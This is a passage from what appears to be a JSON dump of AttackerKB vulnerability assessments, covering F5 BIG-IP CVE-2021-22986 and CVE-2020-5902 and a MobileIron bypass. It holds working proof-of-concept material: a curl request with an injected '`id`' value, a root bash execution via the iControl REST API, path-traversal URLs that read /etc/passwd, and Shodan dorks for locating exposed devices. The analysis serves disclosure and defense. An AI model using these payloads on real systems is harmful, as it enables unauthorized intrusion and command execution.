AuthzHelper.getAuthSource(AuthnWorker.this.getServer(), getAuthSourceTypeCompletion);\n try {\n int remainingSleepTime = 800, numberOfAttempts = 0;\n int multiplier = 1; numberOfAttempts = 1;\n for (; providerName[0] == null;\n multiplier *= 2, numberOfAttempts++) {\n \n TimeUnit.MILLISECONDS.sleep((10 * multiplier));\n remainingSleepTime -= 10 * multiplier;\n if (providerName[0] != null || numberOfAttempts == 5) {\n break;\n }\n }\n \n while (providerName[0] == null) {\n TimeUnit.MILLISECONDS.sleep(50L);\n remainingSleepTime -= 50;\n }\n AuthnWorker.this.getLogger().fine(\"Total Time taken to set the loginProviderName is \" + (800 - remainingSleepTime) + \"ms\");\n } catch (InterruptedException 
e) {\n AuthnWorker.this.getLogger().severe(\"Error while setting value to loginProviderName when no loginReference and no loginProviderName were given\");\n }\n return providerName[0];\n }\n };\n \n Future<String> future = executorService.submit(callable);\n try {\n state.loginProviderName = future.get(800L, TimeUnit.MILLISECONDS);\n executorService.shutdown();\n } catch (TimeoutException e) {\n getLogger().severe(\"Maximum wait time(800ms) exceeded while getting value of loginProviderName\");\n future.cancel(true);\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n } catch (CancellationException|java.util.concurrent.ExecutionException|InterruptedException e) {\n getLogger().severe(\"Error while getting value of loginProviderName:\" + RestHelper.throwableStackToString(e));\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n }\n getLogger().fineFmt(\"loginProviderName set to %s as default value, based on authentication source type when it was null\", new Object[] { state.loginProviderName });\n }\n \n if (state.loginProviderName != null) {\n if (state.loginProviderName.equals(\"local\")) {\n state.loginReference = new RestReference(makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH));\n }\n else if (this.loginNameToReferenceMap.containsKey(state.loginProviderName)) {\n state.loginReference = this.loginNameToReferenceMap.get(state.loginProviderName);\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is invalid.\"));\n return;\n }\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is null.\"));\n \n \n return;\n }\n }\n \n final String failureKey = String.format(\"%s:%s\", new Object[] { (state.username == null) ? 
state.bigipAuthCookie : state.username, state.loginReference.link });\n \n \n \n LoginFailures failures = this.loginFailureMap.get(failureKey);\n \n if (failures != null && failures.failures >= 5) {\n if (RestHelper.getNowMicrosUtc() - failures.lastFailureMicros < FAILED_ATTEMPTS_TIMEOUT) {\n request.setStatusCode(401);\n request.fail(new SecurityException(\"Maximum number of login attempts exceeded.\"));\n return;\n }\n this.loginFailureMap.remove(failureKey);\n }\n \n \n RestRequestCompletion authCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n String loginProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n \n \n String clientId = (state.username == null) ? (\"Cookie \" + state.bigipAuthCookie) : (\"User \" + state.username);\n \n AuthnWorker.this.getLogger().infoFmt(\"%s failed to login from %s using the %s authentication provider\", new Object[] { clientId, this.val$incomingAddress, loginProviderId });\n \n \n AuthnWorker.LoginFailures failures = (AuthnWorker.LoginFailures)AuthnWorker.this.loginFailureMap.get(failureKey);\n if (failures == null) {\n failures = new AuthnWorker.LoginFailures();\n AuthnWorker.this.loginFailureMap.put(failureKey, failures);\n }\n failures.lastFailureMicros = RestHelper.getNowMicrosUtc();\n failures.failures++;\n \n request.setStatusCode(401);\n \n if (ex.getMessage() == null || ex.getMessage().isEmpty()) {\n request.fail(ex, RestErrorResponse.create().setMessage(\"Unable to login using supplied information. 
If you are attempting to login with a configured authentication provider it may be unavailable or no longer exist.\"));\n return;\n }\n request.fail(ex);\n }\n \n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.loginFailureMap.remove(failureKey);\n \n AuthProviderLoginState loggedIn = (AuthProviderLoginState)operation.getTypedBody(AuthProviderLoginState.class);\n \n \n String authProviderId = loggedIn.authProviderName;\n if (authProviderId == null) {\n authProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n }\n \n \n AuthnWorker.this.getLogger().finestFmt(\"User %s successfully logged in from %s using the %s authentication provider.\", new Object[] { loggedIn.username, this.val$incomingAddress, authProviderId });\n \n \n \n \n AuthnWorker.generateToken(AuthnWorker.this.getServer(), request, state, loggedIn);\n }\n };\n \n RestOperation checkAuth = RestOperation.create().setBody(loginState).setUri(makeLocalUri(state.loginReference.link)).setCompletion(authCompletion);\n \n \n sendPost(checkAuth);\n }\n [snip]\n \n\nAlso interesting is the defensive programming added to basic auth. I tested this first for auth bypass but wasn\u2019t successful. 
It is by no means a dead end, since I haven\u2019t actually analyzed the code path yet.\n \n \n [snip]\n - private static boolean setIdentityFromBasicAuth(RestOperation request) {\n +\n +\n + private static boolean setIdentityFromBasicAuth(final RestOperation request, final Runnable runnable) {\n String authHeader = request.getBasicAuthorization();\n if (authHeader == null) {\n return false;\n }\n - AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n - request.setIdentityData(components.userName, null, null);\n + final AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n +\n +\n +\n +\n +\n + String xForwardedHostHeaderValue = request.getAdditionalHeader(\"X-Forwarded-Host\");\n +\n +\n +\n + if (xForwardedHostHeaderValue == null) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n +\n + String[] valueList = xForwardedHostHeaderValue.split(\", \");\n + int valueIdx = (valueList.length > 1) ? 
(valueList.length - 1) : 0;\n + if (valueList[valueIdx].contains(\"localhost\") || valueList[valueIdx].contains(\"127.0.0.1\")) {\n +\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n + if (!PasswordUtil.isPasswordReset().booleanValue()) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n + AuthProviderLoginState loginState = new AuthProviderLoginState();\n + loginState.username = components.userName;\n + loginState.password = components.password;\n + loginState.address = request.getRemoteSender();\n + RestRequestCompletion authCompletion = new RestRequestCompletion()\n + {\n + public void completed(RestOperation subRequest) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n +\n +\n + public void failed(Exception ex, RestOperation subRequest) {\n + RestOperationIdentifier.LOGGER.warningFmt(\"Failed to validate %s\", new Object[] { ex.getMessage() });\n + if (ex.getMessage().contains(\"Password expired\")) {\n + request.fail(new SecurityException(ForwarderPassThroughWorker.CHANGE_PASSWORD_NOTIFICATION));\n + }\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n + };\n +\n + try {\n + RestOperation subRequest = RestOperation.create().setBody(loginState).setUri(UrlHelper.makeLocalUri(new URI(TMOS_AUTH_LOGIN_PROVIDER_WORKER_URI_PATH), null)).setCompletion(authCompletion);\n +\n +\n + RestRequestSender.sendPost(subRequest);\n + } catch (URISyntaxException e) {\n + LOGGER.warningFmt(\"ERROR: URISyntaxEception %s\", new Object[] { e.getMessage() });\n + }\n return true;\n }\n }\n [snip]\n \n\n### PoC\n\nThe affected endpoint is `/mgmt/shared/authn/login`.\n \n \n wvu@kharak:~$ curl -ks https://192.168.123.134/mgmt/shared/authn/login -d 
'{\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"filePath\":\"`id`\"}' | jq .\n {\n \"code\": 400,\n \"message\": \"request failed with null exception\",\n \"referer\": \"192.168.123.1\",\n \"restOperationId\": 4483409,\n \"kind\": \":resterrorresponse\"\n }\n wvu@kharak:~$\n \n\nThe `filePath` parameter is cleared from the request, rendering the RCE endpoint unusable with the SSRF. **ETA: Other researchers noted this (quickly!) in a [Twitter thread](<https://twitter.com/Smi1eSEC/status/1371754129673052160>), and I have confirmed that their findings match mine.**\n \n \n [pid 70562] execve(\"/bin/tar\", [\"tar\", \"-xvf\", \"/var/apm/f5-iappslx-agc-usecase-pack/f5-iappslx-agc-usecase-pack-7.0-0.0.1481.tar.gz\", \"--directory\", \"/var/config/rest/downloads/\"], [/* 9 vars */]) = 0\n \n\n### IOCs\n\nErrors may be seen in `/var/log/restjavad.0.log`. This log file is rotated. Log level can be adjusted in `/etc/restjavad.log.conf`.\n \n \n [F][11000][16 Mar 2021 21:41:58 UTC][8100/shared/authn/login AuthnWorker] User null successfully logged in from 192.168.123.1 using the http://localhost/mgmt/tm/access/bundle-install-tasks authentication provider.\n [F][11014][16 Mar 2021 21:41:58 UTC][RestOperation] Cleared the request content for key originalRequestBody\n [WARNING][11019][16 Mar 2021 21:41:58 UTC][RestOperation] Unable to generate error body for POST http://localhost:8100/shared/authz/tokens 400: java.util.ConcurrentModificationException\n \tat com.google.gson.internal.LinkedTreeMap$LinkedTreeMapIterator.nextNode(LinkedTreeMap.java:544)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:568)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:566)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2458)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat 
com.f5.rest.workers.AuthTokenWorker.addOrUpdateAuthToken(AuthTokenWorker.java:337)\n \tat com.f5.rest.workers.AuthTokenWorker.onPost(AuthTokenWorker.java:291)\n \tat com.f5.rest.common.RestCollectionWorker.callDerivedRestMethod(RestCollectionWorker.java:937)\n \tat com.f5.rest.common.RestWorker.callRestMethodHandler(RestWorker.java:1190)\n \tat com.f5.rest.common.RestServer.processQueuedRequests(RestServer.java:1207)\n \tat com.f5.rest.common.RestServer.access$000(RestServer.java:44)\n \tat com.f5.rest.common.RestServer$1.run(RestServer.java:285)\n \tat java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:473)\n \tat java.util.concurrent.FutureTask.run(FutureTask.java:262)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:178)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:292)\n \tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1152)\n \tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:622)\n \tat java.lang.Thread.run(Thread.java:748)\n \n [F][11023][16 Mar 2021 21:41:58 UTC][RestOperation] Cleared the request content for key originalRequestBody\n [WARNING][11026][16 Mar 2021 21:41:58 UTC][RestOperation] Unable to generate error body for POST http://localhost:8100/shared/authn/login 400: java.util.ConcurrentModificationException\n \tat com.google.gson.internal.LinkedTreeMap$LinkedTreeMapIterator.nextNode(LinkedTreeMap.java:544)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:568)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:566)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2458)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.workers.authn.AuthnWorker$8.failed(AuthnWorker.java:533)\n \tat 
com.f5.rest.workers.authn.AuthnWorker$8.failed(AuthnWorker.java:529)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2486)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.common.RestWorker$5.failed(RestWorker.java:865)\n \tat com.f5.rest.common.RestWorker$5.failed(RestWorker.java:850)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2486)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.workers.AuthTokenWorker.addOrUpdateAuthToken(AuthTokenWorker.java:337)\n \tat com.f5.rest.workers.AuthTokenWorker.onPost(AuthTokenWorker.java:291)\n \tat com.f5.rest.common.RestCollectionWorker.callDerivedRestMethod(RestCollectionWorker.java:937)\n \tat com.f5.rest.common.RestWorker.callRestMethodHandler(RestWorker.java:1190)\n \tat com.f5.rest.common.RestServer.processQueuedRequests(RestServer.java:1207)\n \tat com.f5.rest.common.RestServer.access$000(RestServer.java:44)\n \tat com.f5.rest.common.RestServer$1.run(RestServer.java:285)\n \tat java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:473)\n \tat java.util.concurrent.FutureTask.run(FutureTask.java:262)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:178)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:292)\n \tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1152)\n \tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:622)\n \tat java.lang.Thread.run(Thread.java:748)\n \n\nNote the \u201csuccessful\u201d login from user `null`, which indicates token generation was triggered. I decided to pursue this vector after my failure with the RCE endpoint.\n\n## Analysis\n\nThis is what you really came here for. 
;)\n\n### Debugging\n\nA long JDB session in which request parameter clearing is demonstrated.\n \n \n Breakpoint hit: \"thread=qtp12784804-16 - /mgmt/shared/authn/login\", com.f5.rest.common.RestOperationIdentifier.setIdentityFromBasicAuth(), line=245 bci=11\n 245 AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n \n qtp12784804-16 - /mgmt/shared/authn/login[1] where\n [1] com.f5.rest.common.RestOperationIdentifier.setIdentityFromBasicAuth (RestOperationIdentifier.java:245)\n [2] com.f5.rest.common.RestOperationIdentifier.setIdentityFromAuthenticationData (RestOperationIdentifier.java:52)\n [3] com.f5.rest.app.RestServerServlet$ReadListenerImpl.onAllDataRead (RestServerServlet.java:136)\n [4] org.eclipse.jetty.server.HttpInput.run (HttpInput.java:443)\n [5] org.eclipse.jetty.server.handler.ContextHandler.handle (ContextHandler.java:1,175)\n [6] org.eclipse.jetty.server.HttpChannel.handle (HttpChannel.java:355)\n [7] org.eclipse.jetty.server.HttpChannel.run (HttpChannel.java:262)\n [8] org.eclipse.jetty.util.thread.QueuedThreadPool.runJob (QueuedThreadPool.java:635)\n [9] org.eclipse.jetty.util.thread.QueuedThreadPool$3.run (QueuedThreadPool.java:555)\n [10] java.lang.Thread.run (Thread.java:748)\n qtp12784804-16 - /mgmt/shared/authn/login[1] list\n 241 String authHeader = request.getBasicAuthorization();\n 242 if (authHeader == null) {\n 243 return false;\n 244 }\n 245 => AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n 246 request.setIdentityData(components.userName, null, null);\n 247 return true;\n 248 }\n 249 }\n qtp12784804-16 - /mgmt/shared/authn/login[1] print authHeader\n authHeader = \"Og==\"\n qtp12784804-16 - /mgmt/shared/authn/login[1] next\n >\n Step completed: \"thread=qtp12784804-16 - /mgmt/shared/authn/login\", com.f5.rest.common.RestOperationIdentifier.setIdentityFromBasicAuth(), line=246 bci=16\n 246 request.setIdentityData(components.userName, null, null);\n \n 
qtp12784804-16 - /mgmt/shared/authn/login[1] dump components\n components = {\n userName: null\n password: null\n }\n qtp12784804-16 - /mgmt/shared/authn/login[1] cont\n >\n Breakpoint hit: \"thread=Non-Blocking threadPool_4\", com.f5.rest.workers.authn.AuthnWorker.onPost(), line=341 bci=141\n 341 request.setBody(state);\n \n Non-Blocking threadPool_4[1] where\n [1] com.f5.rest.workers.authn.AuthnWorker.onPost (AuthnWorker.java:341)\n [2] com.f5.rest.common.RestWorker.callDerivedRestMethod (RestWorker.java:1,276)\n [3] com.f5.rest.common.RestWorker.callRestMethodHandler (RestWorker.java:1,190)\n [4] com.f5.rest.common.RestServer.processQueuedRequests (RestServer.java:1,207)\n [5] com.f5.rest.common.RestServer.access$000 (RestServer.java:44)\n [6] com.f5.rest.common.RestServer$1.run (RestServer.java:285)\n [7] java.util.concurrent.Executors$RunnableAdapter.call (Executors.java:473)\n [8] java.util.concurrent.FutureTask.run (FutureTask.java:262)\n [9] java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201 (ScheduledThreadPoolExecutor.java:178)\n [10] java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run (ScheduledThreadPoolExecutor.java:292)\n [11] java.util.concurrent.ThreadPoolExecutor.runWorker (ThreadPoolExecutor.java:1,152)\n [12] java.util.concurrent.ThreadPoolExecutor$Worker.run (ThreadPoolExecutor.java:622)\n [13] java.lang.Thread.run (Thread.java:748)\n Non-Blocking threadPool_4[1] list\n 337 return;\n 338 }\n 339\n 340 state.password = null;\n 341 => request.setBody(state);\n 342\n 343\n 344\n 345 if (state.loginReference == null) {\n 346 if (state.loginProviderName == null) {\n Non-Blocking threadPool_4[1] print request\n request = \"[\n id=6146169\n referer=192.168.123.1\n uri=http://localhost:8100/shared/authn/login\n method=POST\n statusCode=200\n contentType=application/x-www-form-urlencoded\n contentLength=121\n contentRange=null\n deadline=Tue Mar 16 15:14:01 PDT 2021\n 
body={\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"filePath\":\"`id`\"}\n forceSocket=false\n isResponse=false\n retriesRemaining=5\n coordinationId=null\n isConnectionCloseRequested=false\n isConnectionKeepAlive=true\n isRestErrorResponseRequired=true\n AdditionalHeadersAsString=\n Request: 'Local-Ip-From-Httpd'='192.168.123.134'\n 'X-Forwarded-Proto'='http'\n 'X-Forwarded-Server'='localhost.localdomain'\n 'X-F5-New-Authtok-Reqd'='false'\n 'X-Forwarded-Host'='192.168.123.134'\n Response:<empty>\n ResponseHeadersTrace=\n X-F5-Config-Api-Status=0]\"\n Non-Blocking threadPool_4[1] next\n >\n Step completed: \"thread=Non-Blocking threadPool_4\", com.f5.rest.workers.authn.AuthnWorker.onPost(), line=345 bci=147\n 345 if (state.loginReference == null) {\n \n Non-Blocking threadPool_4[1] print request\n request = \"[\n id=6146169\n referer=192.168.123.1\n uri=http://localhost:8100/shared/authn/login\n method=POST\n statusCode=200\n contentType=application/json\n contentLength=139\n contentRange=null\n deadline=Tue Mar 16 15:14:01 PDT 2021\n body={\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"generation\":0,\"lastUpdateMicros\":0}\n forceSocket=false\n isResponse=false\n retriesRemaining=5\n coordinationId=null\n isConnectionCloseRequested=false\n isConnectionKeepAlive=true\n isRestErrorResponseRequired=true\n AdditionalHeadersAsString=\n Request: 'Local-Ip-From-Httpd'='192.168.123.134'\n 'X-Forwarded-Proto'='http'\n 'X-Forwarded-Server'='localhost.localdomain'\n 'X-F5-New-Authtok-Reqd'='false'\n 'X-Forwarded-Host'='192.168.123.134'\n Response:<empty>\n ResponseHeadersTrace=\n X-F5-Config-Api-Status=0]\"\n Non-Blocking threadPool_4[1] cont\n >\n Breakpoint hit: \"thread=Non-Blocking threadPool_4\", com.f5.rest.workers.authn.AuthnWorker.onPost(), line=506 bci=600\n 506 sendPost(checkAuth);\n \n Non-Blocking threadPool_4[1] list\n 502\n 503 
RestOperation checkAuth = RestOperation.create().setBody(loginState).setUri(makeLocalUri(state.loginReference.link)).setCompletion(authCompletion);\n 504\n 505\n 506 => sendPost(checkAuth);\n 507 }\n 508\n 509\n 510\n 511\n Non-Blocking threadPool_4[1] print checkAuth\n checkAuth = \"[\n id=6146236\n referer=null\n uri=http://localhost:8100/tm/access/bundle-install-tasks\n method=null\n statusCode=200\n contentType=application/json\n contentLength=84\n contentRange=null\n deadline=Tue Mar 16 15:14:47 PDT 2021\n body={\"address\":\"192.168.123.1\",\"bigipAuthCookie\":\"\",\"generation\":0,\"lastUpdateMicros\":0}\n forceSocket=false\n isResponse=false\n retriesRemaining=5\n coordinationId=null\n isConnectionCloseRequested=false\n isConnectionKeepAlive=true\n isRestErrorResponseRequired=true\n AdditionalHeadersAsString=\n Request:<empty> Response:<empty>\n ResponseHeadersTrace=\n X-F5-Config-Api-Status=0]\"\n Non-Blocking threadPool_4[1] cont\n >\n \n\n### Parameter allowlist\n\nAllowed parameters are in the `com.f5.rest.workers.authn.providers.AuthProviderLoginState` class.\n \n \n package com.f5.rest.workers.authn.providers;\n \n import com.f5.rest.common.RestReference;\n import com.f5.rest.common.RestWorkerState;\n import java.util.List;\n \n public class AuthProviderLoginState extends RestWorkerState {\n public String username;\n \n public String password;\n \n public String address;\n \n public String bigipAuthCookie;\n \n public String authProviderName;\n \n public RestReference userReference;\n \n public List<RestReference> groupReferences;\n }\n \n\nThis significantly limits the power of the SSRF, unfortunately. However, the fraudulent token generation should be investigated further. I have yet to find an endpoint that will respond affirmatively to the token generation. **ETA: See the RCE update at the bottom of the page. Rich found a usable endpoint.**\n\n### No password?\n\nI actually found this early on but didn\u2019t document it yet. 
Local requests to `restjavad` or `/usr/bin/icrd_child` don\u2019t require a password\u2026\n \n \n [root@localhost:NO LICENSE:Standalone] ~ # curl -su admin: -H \"Content-Type: application/json\" http://localhost:8100/mgmt/tm/util/bash -d '{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' | jq .\n {\n \"kind\": \"tm:util:bash:runstate\",\n \"command\": \"run\",\n \"utilCmdArgs\": \"-c id\",\n \"commandResult\": \"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\\n\"\n }\n [root@localhost:NO LICENSE:Standalone] ~ #\n \n\nThis formed the basis for most of my SSRF attempts until I saw the parameter allowlist and noticed my `Authorization` header wasn\u2019t being passed through. :<\n\n## RCE update\n\n[Rich Warren](<https://twitter.com/buffaloverflow>) has produced a [full RCE chain](<https://twitter.com/buffaloverflow/status/1371988878672941057>) using the SSRF! **ETA: I tested 10% of the registered endpoints and discovered no fewer than 15 that were chainable to full RCE. This concludes my investigation of CVE-2021-22986. 
Thank you to F5 SIRT for being wonderful to work with, and many thanks to Rich for being a great collaborator!**\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-06T00:00:00", "id": "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E", "href": "https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-03T23:01:58", "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n\n \n**Recent assessments:** 
\n \n**Mad-robot** at July 05, 2020 1:21pm UTC reported:\n\n**CVE-2020-5902**\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n \n \n /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp\n \n /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n \n /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\n \n\n**Patch & Mitigation:-**\n \n \n <LocationMatch \".*\\.\\.;.*\">\n Redirect 404 /\n </LocationMatch>\n \n\n**Versions Effected**\n\n * BIG-IP 15.x: 15.1.0/15.0.0 \n\n * BIG-IP 14.x: 14.1.0 ~ 14.1.2 \n\n * BIG-IP 13.x: 13.1.0 ~ 13.1.3 \n\n * BIG-IP 12.x: 12.1.0 ~ 12.1.5 \n\n * BIG-IP 11.x: 11.6.1 ~ 11.6.5 \n\n\n**Dorks** \n<https://beta.shodan.io/search?query=vuln%3Acve-2020-5902>\n\n<https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-01T00:00:00", "type": "attackerkb", "title": "CVE-2020-5902 \u2014 TMUI RCE vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-12-21T00:00:00", "id": "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "href": "https://attackerkb.com/topics/evLpPlZf0i/cve-2020-5902-tmui-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:11:10", "description": "An authentication bypass vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 that allows remote attackers to bypass authentication mechanisms via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 22, 2020 8:22pm UTC reported:\n \n \n https://mobileiron/mifs/.;/services/someService\n \n\nThe \u201c[auth bypass](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>)\u201d relies on a discrepancy between how Apache and Tomcat parse the path component in the URI, which is the same technique that was applied to [CVE-2020-5902](<https://attackerkb.com/topics/evLpPlZf0i/cve-2020-5902-tmui-rce-vulnerability>).\n\n\u201cBypassing authentication\u201d allows one to achieve RCE against either the user interface or the management interface, though it\u2019s not clear that [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) is the RCE used in the [blog post](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>). This is more of an ACL bypass than an auth bypass, honestly. 
This was briefly mentioned in the post.\n\nSince MobileIron is [mobile device management (MDM)](<https://en.wikipedia.org/wiki/Mobile_device_management>) software, which is increasingly relevant as the workforce shifts toward remote work, compromising a target\u2019s MDM infrastructure may have devastating consequences.\n\nDevelopers gluing disparate pieces of software together should take care to avoid turning expected input from one software into unexpected input for another. This bug class is [well-documented](<https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf>). In the end, even input sanitization should take care to avoid normalization bugs.\n\nGreat find, Orange!\n\nAlso see [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), a MobileIron RCE.\n\n**ETA: [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) uses an _ACL_ bypass, but in retrospect, I don\u2019t think it\u2019s this _auth_ bypass.** This analysis can be applied to [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), consequently.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 